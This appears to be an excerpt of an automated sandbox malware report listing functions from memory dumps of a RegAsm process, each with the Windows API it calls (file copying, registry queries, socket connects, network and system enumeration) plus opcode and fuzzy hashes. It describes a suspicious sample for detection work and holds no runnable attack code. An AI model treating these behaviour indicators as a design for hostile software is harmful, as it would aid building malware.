Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 5c8c4e981b3aae736eae6df5398d2b0e5b531708c5fafa792dc5faf853b6b305
Instruction ID: 1df1b524a6229eafe311957d6a7288f3ce73a1d8be6de8a776ca544e9db6e8a7
Opcode Fuzzy Hash: 5c8c4e981b3aae736eae6df5398d2b0e5b531708c5fafa792dc5faf853b6b305
Instruction Fuzzy Hash: 4021CF71500340AFEB21CF69DC45B66FBA8FF04320F14886AED898A652D375A408DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F72196, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00F7220A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: bb4034ee82123a93a0aeaf52c3715be09a7e9442c27726d5db0bb779b7938047
Instruction ID: 234f2470d6adc4f38d15c84ed9850533fda88b2b0d617a689776bf9d44c4c816
Opcode Fuzzy Hash: bb4034ee82123a93a0aeaf52c3715be09a7e9442c27726d5db0bb779b7938047
Instruction Fuzzy Hash: 9521AE71500340AFE721CF55DD85F66FBE8EF08320F14845EE9899B652D775E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F7354C, Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F735BA

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 92542be4e458f491c3ecd305d31ab067ef4b778158cdf35cbaa01d2af290966e
Instruction ID: 9c432579b9ead355d73c1c327668de8fa23bc0901755762728f79eb74f41f312
Opcode Fuzzy Hash: 92542be4e458f491c3ecd305d31ab067ef4b778158cdf35cbaa01d2af290966e
Instruction Fuzzy Hash: 732181B15093819FD721CF25DC85B52BFE8EF05220F0C84ABE849CB252D234D904DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F71DFA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F71E6C

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 296d2355dddc7b985a3ecf43c02dc8a4a397009710b9e637114f7aa8036b12dd
Instruction ID: 7049e0638d45f09af2351b860a284dfa5016b8958beb5dd81e0295977f3b5472
Opcode Fuzzy Hash: 296d2355dddc7b985a3ecf43c02dc8a4a397009710b9e637114f7aa8036b12dd
Instruction Fuzzy Hash: 9A116D72600704AFEB21CE19DC84F66BBA8EF08720F14845AED499A652D764F908DA72

Uniqueness

Uniqueness Score: -1.00%

Function 00F72612, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72671

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 9d215d9dd37c5e6896ca0508a86fcbf59f818324bb691441c9a1ad19145d069c
Instruction ID: 89b6e547a2e93b895e1b953fde549c1eae68d89ffc50091b27a3547a4cbb4194
Opcode Fuzzy Hash: 9d215d9dd37c5e6896ca0508a86fcbf59f818324bb691441c9a1ad19145d069c
Instruction Fuzzy Hash: 4B119372500300AFEB61CF65DD85B6ABBA8EF04320F14846BED499B655D774E804DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3B4FE

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: fa62c078f617dd3a19e74c93652da020af9e0287c9dd88928efce41fac098160
Instruction ID: c780ccf7177013072a178b1311f805e9bc45a9ba6bb3c3911b733493464529dc
Opcode Fuzzy Hash: fa62c078f617dd3a19e74c93652da020af9e0287c9dd88928efce41fac098160
Instruction Fuzzy Hash: 2411C471500340AFEB22CF59DC85B66FBA8EF44720F04846AED459B645D774E404CB76

Uniqueness

Uniqueness Score: -1.00%

Function 00F73490, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F734F7

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: f436616347f92b8bf6839b09002cfeac6e51b76a29b1ae806d75d14c94dbb44f
Instruction ID: d0993003c815080ffc8b1c2d05c6657f6769b8c354af498ddd41515a40fc10f9
Opcode Fuzzy Hash: f436616347f92b8bf6839b09002cfeac6e51b76a29b1ae806d75d14c94dbb44f
Instruction Fuzzy Hash: 66117271508380AFD715CF25DC84B56BFE8EF06220F0984AEED49CB252D334E904DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F72D26, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72D8A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 14de798f2b216abe2f3f119539090f4f78e564f234d3c1c94072ce1b4f686df1
Instruction ID: 7214b78883b4d5f111c0a0e887c697be82c53a85409286a250245cf9696c980d
Opcode Fuzzy Hash: 14de798f2b216abe2f3f119539090f4f78e564f234d3c1c94072ce1b4f686df1
Instruction Fuzzy Hash: B51190B2500304AFEB61CF59DD84FA6BBACEF44320F14846BE9499B246D674E404CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 1DB3A8A8

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d83c018e7590b7d62f17c84b7eca90cd77e29f76ab11e74de944886264f10e44
Instruction ID: def467f464714a77ac9819d1bf0989f6437fdf609dd549926d009b528954ea83
Opcode Fuzzy Hash: d83c018e7590b7d62f17c84b7eca90cd77e29f76ab11e74de944886264f10e44
Instruction Fuzzy Hash: F3216A7140D3C4AFD7138B258C94662BFB4DF03224F0984DAEC858F1A3D2699908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB3A7F6

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: db9d25d751a066e4040b0510d8d54f46e1d2b45828fd2c9a8a2433fe45d60753
Instruction ID: 49966051a09a7cc3f4d656f2592df9203bd27ede2d74bc1d9948195ecb43b01b
Opcode Fuzzy Hash: db9d25d751a066e4040b0510d8d54f46e1d2b45828fd2c9a8a2433fe45d60753
Instruction Fuzzy Hash: 33117271409380AFDB228F55DC44B62FFF4EF46210F08889AED858B552D375A819DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F70E4E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F70EAD

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 74170840cdc9aef73b2ea9506a31990fbacc4958536008bf29dc5ef4ba943ed7
Instruction ID: cd72caa828a6a78394fb9600322daa2145d31dc4b7c9dd568e45963c49b3b29b
Opcode Fuzzy Hash: 74170840cdc9aef73b2ea9506a31990fbacc4958536008bf29dc5ef4ba943ed7
Instruction Fuzzy Hash: 4A11BFB2500304EFEB21CF55DC84F66FBA8EF04320F14886AED499B646D775A404CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F73615, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F73674

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: DirectoryRemove
String ID:
API String ID: 597925465-0
Opcode ID: 119b80bc37f5f44a784feffc45507543dae018103e0b0de740a0979fada0cf99
Instruction ID: 9e66ab7144849124f308a971392d37e71d07c9d63aadf86be5e51a9d6921d87f
Opcode Fuzzy Hash: 119b80bc37f5f44a784feffc45507543dae018103e0b0de740a0979fada0cf99
Instruction Fuzzy Hash: 5F115172905380AFD711CB25DC85B52BFE8EF42220F0984AAED49CB252D274E948DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F7168E, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F716EC

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 9246ea1cc8f670b8efc0815606c22e60dc9eedc49ed927c7b046d260f90250d3
Instruction ID: 9e4d19ec5258344508a077fed1bd05e5f02fe5241693d8ea983ea6468440a402
Opcode Fuzzy Hash: 9246ea1cc8f670b8efc0815606c22e60dc9eedc49ed927c7b046d260f90250d3
Instruction Fuzzy Hash: F41193755093C09FDB128F65DC44752BFB4EF02220F0884EBED858F262D235A809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F72A6A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72AC3

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 2e545d8f6efa6953b2e7ca56aadcc759a1c88a5677f78729bf9b0da528b52f3c
Instruction ID: 911c4bd7baae75adaee0e2e71f32ee192b6ad8ed7a5ae0bb57fbb396725f7aa3
Opcode Fuzzy Hash: 2e545d8f6efa6953b2e7ca56aadcc759a1c88a5677f78729bf9b0da528b52f3c
Instruction Fuzzy Hash: 521191B1500344AFEB61CF59DC84B66BBA8EF44320F14846AED499B246D778A804CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F70522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 00F7058B

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7ba7ff9c527ec06f960ccda14e76b73571256042efe40c9e77935faf1dc16599
Instruction ID: b7a5b25ef123c51dca198720c25881760312a1a85eb33ba00700d2af550dc484
Opcode Fuzzy Hash: 7ba7ff9c527ec06f960ccda14e76b73571256042efe40c9e77935faf1dc16599
Instruction Fuzzy Hash: 6411E571500300AFE720CB15DC45F66FB98DF04720F18C05AED485B286D7B4A908CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F72E0A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72E69

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 1bf1878e672e67247795063bceef85070af439f4d209fdbc92294ba2abf223a6
Instruction ID: b34c54654bfc1823d34b66b599b4d3771f69b3b922770ff55c517572b196eff2
Opcode Fuzzy Hash: 1bf1878e672e67247795063bceef85070af439f4d209fdbc92294ba2abf223a6
Instruction Fuzzy Hash: 4011ACB2500304AFEB218F15DC84F66FBA8EF48720F14845BED495A656D374E808DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DB3A0D5

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 9c083c23a5595ca26ac17756675a627660bf710d8be3943f300ef38d5cb94a0e
Instruction ID: d7e1f9bddf1f9f8be03e818b3d652a92a763a8e334ef669d125d83ebf2f482a8
Opcode Fuzzy Hash: 9c083c23a5595ca26ac17756675a627660bf710d8be3943f300ef38d5cb94a0e
Instruction Fuzzy Hash: D5118F71409780AFDB22CF15DD44B52FFB4EF46224F08849AED898F552C275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DB3AD6A

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 078ccf040e216a66505cbb8fdce7cee50e0fce6ccf2cff85feb863cdeba4298e
Instruction ID: 18915f43857d9c2ccd096cc6a56db6f9ff26ad5a2c39d8654dd747ea29bd660d
Opcode Fuzzy Hash: 078ccf040e216a66505cbb8fdce7cee50e0fce6ccf2cff85feb863cdeba4298e
Instruction Fuzzy Hash: 2311A1B1A00341AFDB51CF2AD884757FBE8EF04622F18C46ADC4ACB656D774E404CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00F73572, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F735BA

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: dab8f601df3c0c0284776b94eeaf0f5807b2dc7a5b5bf8d56d1646e34a316d55
Instruction ID: af8fb31fdb7aa6270bb366b8a0521e484f3bb7dd15c52b470afa9c58d449a833
Opcode Fuzzy Hash: dab8f601df3c0c0284776b94eeaf0f5807b2dc7a5b5bf8d56d1646e34a316d55
Instruction Fuzzy Hash: 221130B1A043419FDB60CF1AD885756FB98EF04320F08C46ADD49CB646D774D904EA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F71906, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F7195C

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: a441cd59c43ff0139acca11d1755b4b38970d802e58c3546e98c530b4dd818ad
Instruction ID: 72c70185487d0f2f3fc028d564316e468db2200e55cb3e0f9fbd3bc0dd58829a
Opcode Fuzzy Hash: a441cd59c43ff0139acca11d1755b4b38970d802e58c3546e98c530b4dd818ad
Instruction Fuzzy Hash: EF01DB71500304AFEB21CF19DC85B66FBA8EF44720F14C497EE495B246D374E509DAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F734B2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F734F7

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 6bfb1dd431f08666a0468be709ac348acc4fa907a7f8d491731dcf4ac94d16fa
Instruction ID: c8414f8137849d53534ab7224e9e0ba0558c040ed354896f8c71a56fd3c76a34
Opcode Fuzzy Hash: 6bfb1dd431f08666a0468be709ac348acc4fa907a7f8d491731dcf4ac94d16fa
Instruction Fuzzy Hash: 5B115271A042419FDB64CF19D885766BBD8EF04320F08C4AADD49CB646E774D904DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F70CBE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F70D11

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1f7885d87d1b043959344a4dea2e32f36106bfd87bd0560c882399d4286d507f
Instruction ID: 7acd2a1a6d11c226a6b36facca0253fd93c26c535af151a4563259b22a4a5914
Opcode Fuzzy Hash: 1f7885d87d1b043959344a4dea2e32f36106bfd87bd0560c882399d4286d507f
Instruction Fuzzy Hash: 8A01D271500304AFE721CF55DC85B66FB98DF44720F54C49AED089B286DB78E804CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F72EDE, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00F72F2A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 0d7a51efa1963c78f83c87308ea5a232b7eadbbb7efe84440e28a806372c84c4
Instruction ID: 689f9751c55f6fedfa07036fe598c3245d2bd04b49604278263af3f30aafd0cb
Opcode Fuzzy Hash: 0d7a51efa1963c78f83c87308ea5a232b7eadbbb7efe84440e28a806372c84c4
Instruction Fuzzy Hash: BF115A71A007009FDB61CF55D884BA2FBF4EF04320F08C4AAED498B622D375E818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DB3B6FA

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 826611d85fa3f701acf539ac6cdf86796fab9c28bace83530144fc7e55f02e1e
Instruction ID: 7a772a126b906c3f647db9cb3f562561504c655291c22d0c0447b8d822830c58
Opcode Fuzzy Hash: 826611d85fa3f701acf539ac6cdf86796fab9c28bace83530144fc7e55f02e1e
Instruction Fuzzy Hash: 7F017171500600AFD714DF1ADC85B36FBA8EF89B20F14856AED089B641D731B915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A172, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(?,00000EB4,?,?), ref: 1DB3A1C2

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 0ca0f075f2efb12218fbf93a5ea72e95d90ad09dafbcdf07a7e2a04d7209623c
Instruction ID: e6a0eb799d9574ea30e5d88007ecdebddd7eb44ad21f8df482070723233e1410
Opcode Fuzzy Hash: 0ca0f075f2efb12218fbf93a5ea72e95d90ad09dafbcdf07a7e2a04d7209623c
Instruction Fuzzy Hash: 9301B171500600AFD714DF1ADC85B36FBA8EF88A20F14816AED089B641D331B915CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F72C7E, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000EB4,?,?), ref: 00F72CCE

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: b92c4fa86a58843b3f37d7bed760b597ab5c3ac5f06b5de165d271b0e3c0bba7
Instruction ID: b355bc45ccce3ebf64a30b3fb86f466f46dd7f7de54cfc299791b508acae863d
Opcode Fuzzy Hash: b92c4fa86a58843b3f37d7bed760b597ab5c3ac5f06b5de165d271b0e3c0bba7
Instruction Fuzzy Hash: B601B171500600AFD714DF1ADC85B36FBA8EF88B20F14812AED089B641D331B915CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00F7363A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F73674

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: DirectoryRemove
String ID:
API String ID: 597925465-0
Opcode ID: 04aa8674303bad3eb0f6df6409ea5b7ac7b2172a38fe7b69787d71bb6bebc618
Instruction ID: 57e35eb6fb29d6fef64585fb62c2fdd222126e1c7fa8390a0ba8c7f8ffd2747e
Opcode Fuzzy Hash: 04aa8674303bad3eb0f6df6409ea5b7ac7b2172a38fe7b69787d71bb6bebc618
Instruction Fuzzy Hash: 34014C72A00240AFDB50CF2ADD85B66BB94EF40320F18C4ABDD49CB746D675E904EA62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB3A7F6

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4392b60a8c14f3ee95be4be268155e180758d7dbb90413e13a6c534f6ba8190c
Instruction ID: 0f170dde725f9741919019b57a3163718982a9cd9ec5a9fb385d2f10cb6ce30a
Opcode Fuzzy Hash: 4392b60a8c14f3ee95be4be268155e180758d7dbb90413e13a6c534f6ba8190c
Instruction Fuzzy Hash: C101AD31800340EFDB218F55D884B22FFE0EF08721F18C8AADD494A616D335E414DF62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DB3AB7E

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 31b780fc52261197e533d789b605f7eec482d9cda59fc5234bf69a9e4347c17d
Instruction ID: 6dd5e9b7cfd3ebbd62eef57c92051391a47a4cd38a81d47a070cf54f94129452
Opcode Fuzzy Hash: 31b780fc52261197e533d789b605f7eec482d9cda59fc5234bf69a9e4347c17d
Instruction Fuzzy Hash: EF018F71500600ABD654DF1ADC86B22FBA4FB89B20F14811AED085B641D331B916CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B30E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB3B35E

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fb39a7708c357806d40cbb22ee14539cd7a6b4d047086392f863617ca819d063
Instruction ID: 6d814f612bfb052f36340d8f3c2f5e13a600775e9d215aa9c5044ec99287100e
Opcode Fuzzy Hash: fb39a7708c357806d40cbb22ee14539cd7a6b4d047086392f863617ca819d063
Instruction Fuzzy Hash: 5A01A271500604AFD614DF1ADC86B32FBA4FF89B20F14811AED085B741D371F916CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00F716BA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,540391D1,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00F716EC

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 37c5ba31397331b5a22aa8046f41cbd5b905ed6ee9a0ba155a9d1a8f5d5045c4
Instruction ID: 6a194149493048ba237b2744c9b3f579d0c158afbf94944e13602e45759b6887
